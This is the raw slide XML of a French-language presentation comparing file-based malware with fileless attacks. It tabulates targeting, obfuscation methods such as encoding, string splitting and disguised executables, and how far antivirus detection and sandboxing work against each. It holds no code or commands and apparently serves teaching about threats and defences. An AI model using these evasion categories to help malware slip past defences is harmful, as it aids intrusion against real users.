                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005571" y="2596096"/>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ight Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026582" y="3593751"/>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7315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 2</a:t>
            </a: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2740578102"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3650694" y="1959428"/>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Cible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>une combinaison unique OS/patch.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Peut cibler de nombreuses combinaisons différentes OS/patch</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813187492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Cryptage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Archivage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable déguisé </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable intégré dans un autre fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Encodage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Valeurs ASCII/Unicode échappées</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Fractionnement des chaînes de caractères</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Cryptage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Randomisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de données</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de la structure logique</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Espace blanc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2720333836"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Possible avec signature connue</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Impossible</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="977224267"/>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86711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4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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3" y="2268119"/>
            <a:ext cx="540017" cy="5400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13" y="3275762"/>
            <a:ext cx="540017" cy="54001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808" y="4344240"/>
            <a:ext cx="559900" cy="5599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329045427"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1711371" y="1959428"/>
          <a:ext cx="1143279" cy="358648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Cibles</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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Offuscation</a:t>
                      </a:r>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txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Détection AV</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005571" y="2596096"/>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ight Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047594" y="354036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ight Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026582" y="4566871"/>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3059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 2</a:t>
            </a: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3855417249"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3650694" y="1959428"/>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Cible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>une combinaison unique OS/patch.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Peut cibler de nombreuses combinaisons différentes OS/patch</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813187492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Cryptage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Archivage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable déguisé </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable intégré dans un autre fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Encodage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Valeurs ASCII/Unicode échappées</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Fractionnement des chaînes de caractères</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Cryptage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Randomisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de données</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de la structure logique</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Espace blanc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2720333836"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Possible avec signature connue</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Impossible</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="977224267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Disponibilité physique du fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Impossible</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="486711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4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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57" y="2336653"/>
            <a:ext cx="540017" cy="5400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13" y="3369712"/>
            <a:ext cx="528461" cy="52846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314" y="4344241"/>
            <a:ext cx="481846" cy="48184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351" y="4823327"/>
            <a:ext cx="448828" cy="448828"/>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156292497"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1711371" y="1959428"/>
          <a:ext cx="1143279" cy="358648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Cibles</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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Offuscation</a:t>
                      </a:r>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txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Détection AV</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Sandboxing</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005571" y="2596096"/>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ight Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026582" y="3519305"/>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ight Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026582" y="4585164"/>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ight Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026582" y="4990422"/>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62379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 2</a:t>
            </a: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3649828872"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3620549" y="1607735"/>
          <a:ext cx="8128000" cy="4246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Cible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>une combinaison unique OS/patch.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Peut cibler de nombreuses combinaisons différentes OS/patch</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813187492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Cryptage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Archivage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable déguisé </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Exécutable intégré dans un autre fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Encodage</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Valeurs ASCII/Unicode échappées</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Fractionnement des chaînes de caractères</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Cryptage </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Randomisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de données</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Obfuscation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> de la structure logique</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Espace blanc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2720333836"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Possible avec signature connue</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Impossible</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="977224267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Disponibilité physique du fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Impossible</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="486711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400" dirty="0" smtClean="0"/>
                        <a:t>Les malware basés sur des fichiers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> ont </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>un comportement anormal après avoir compromis l'hôte ciblé. Les</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> défenses OS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>sont conçues pour détecter ce type de comportement.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400" dirty="0" smtClean="0"/>
                        <a:t>Les attaques </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>fileless</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>sont conçues pour se comporter comme un processus bénin, elles peuvent ne pas être signalées comme une anomalie.</a:t>
                      </a:r>
                      <a:r>
